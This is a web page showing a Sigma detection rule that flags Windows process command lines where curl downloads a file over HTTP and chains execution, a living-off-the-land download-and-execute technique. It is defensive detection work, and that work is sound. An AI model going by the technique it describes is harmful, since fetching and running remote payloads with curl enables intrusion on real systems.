Curl Download And Execute Combination

Mar 11, 2024 · attack.defense_evasion attack.t1218 attack.command_and_control attack.t1105 ·

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

Sigma rule (View on GitHub)

 1title: Curl Download And Execute Combination
 2id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
 3status: test
 4description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
 5references:
 6    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
 7author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
 8date: 2020/01/13
 9modified: 2024/03/05
10tags:
11    - attack.defense_evasion
12    - attack.t1218
13    - attack.command_and_control
14    - attack.t1105
15logsource:
16    category: process_creation
17    product: windows
18detection:
19    selection:
20        CommandLine|contains|windash: ' -c '
21        CommandLine|contains|all:
22            - 'curl '
23            - 'http'
24            - '-o'
25            - '&'
26    condition: selection
27falsepositives:
28    - Unknown
29level: high

References

https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983

Read More

Curl Download And Execute Combination

Sigma rule (View on GitHub)

References

https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983

Related rules